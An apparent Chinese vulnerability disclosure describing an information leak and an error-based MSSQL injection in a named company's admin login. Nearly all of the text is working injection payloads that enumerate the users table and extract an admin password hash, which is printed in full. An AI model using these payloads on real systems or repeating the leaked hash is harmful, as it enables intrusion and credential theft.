信游科技敏感信息泄露及sql注入

### 简要描述： 信游科技敏感信息泄露+后台登陆POST注入 ### 详细说明： [<img src="https://images.seebug.org/upload/201403/15011401c38f244c53a64fdbecc9a0e827bdc7c1.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/15011401c38f244c53a64fdbecc9a0e827bdc7c1.png) [<img src="https://images.seebug.org/upload/201403/15011409af9d77b3e8a9f2bcfe878627f4e7976a.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/15011409af9d77b3e8a9f2bcfe878627f4e7976a.png) [<img src="https://images.seebug.org/upload/201403/1501141923d7157a40ca6a97b10250b91a7f955a.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/1501141923d7157a40ca6a97b10250b91a7f955a.png) 后台登陆 输入a' having 1=1-- [<img src="https://images.seebug.org/upload/201403/1501150910c01d030fc347407733f0f6113d817a.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/1501150910c01d030fc347407733f0f6113d817a.png) 继续输入a' group by xy_users.ID having 1=1-- [<img src="https://images.seebug.org/upload/201403/15011554f205a840a9668fc1079f1be80925bfc3.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/15011554f205a840a9668fc1079f1be80925bfc3.png) 无法继续爆出了尝试一下 ### 漏洞证明： a' and 1=convert(int,(select top 1 col_name(object_id ('xy_users'),1) from xy_users)) and '1'='1 a' and 1=convert(int,(select top 1 col_name(object_id ('xy_users'),2) from xy_users)) and '1'='1 a' and 1=convert(int,(select top 1 col_name(object_id ('xy_users'),3) from xy_users)) and '1'='1 [<img src="https://images.seebug.org/upload/201403/1501172138f4a6f251858847d02d602afe81c463.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/1501172138f4a6f251858847d02d602afe81c463.png) a' and 1=convert(int,(select top 1 col_name(object_id ('xy_users'),4) from xy_users)) and '1'='1 [<img src="https://images.seebug.org/upload/201403/15011755da41fa7203a2a9d82728d6441f14ddd9.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/15011755da41fa7203a2a9d82728d6441f14ddd9.png) 依次爆出 Group State isdelete a' and 1=convert(int,(select top 1 col_name(object_id ('xy_users'),8) from xy_users)) and '1'='1 [<img src="https://images.seebug.org/upload/201403/15011847051cab0c7d28ca0dbb2bc2d90adb182e.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/15011847051cab0c7d28ca0dbb2bc2d90adb182e.png) 成功爆出xy_users表中所有列ID Account Group State isdelete Name Password 爆内容 a' and (select top 1 xy_users.Name from xy_users)>0-- [<img src="https://images.seebug.org/upload/201403/150119251cd978c64ea879c20693640bbd078404.png" alt="9.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/150119251cd978c64ea879c20693640bbd078404.png) a' and (select top 1 xy_users.Password from xy_users)>0-- [<img src="https://images.seebug.org/upload/201403/15012006f99eb5c7ddda4552969cf444059aac5a.png" alt="10.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/15012006f99eb5c7ddda4552969cf444059aac5a.png) 在将 nvarchar 值 'abb8cd5c9d9d1e3c926f9ad19f863781' 转换成数据类型 int 时失败 破之 [<img src="https://images.seebug.org/upload/201403/150120289fe06443dec5a9e8299562844373a348.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/150120289fe06443dec5a9e8299562844373a348.png)